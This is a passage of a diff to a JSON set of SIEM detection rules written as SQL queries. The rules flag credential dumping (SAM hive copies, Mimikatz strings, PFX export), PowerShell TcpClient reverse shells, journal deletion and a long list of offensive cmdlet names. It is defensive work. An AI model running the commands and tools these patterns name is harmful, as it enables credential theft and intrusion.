'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine 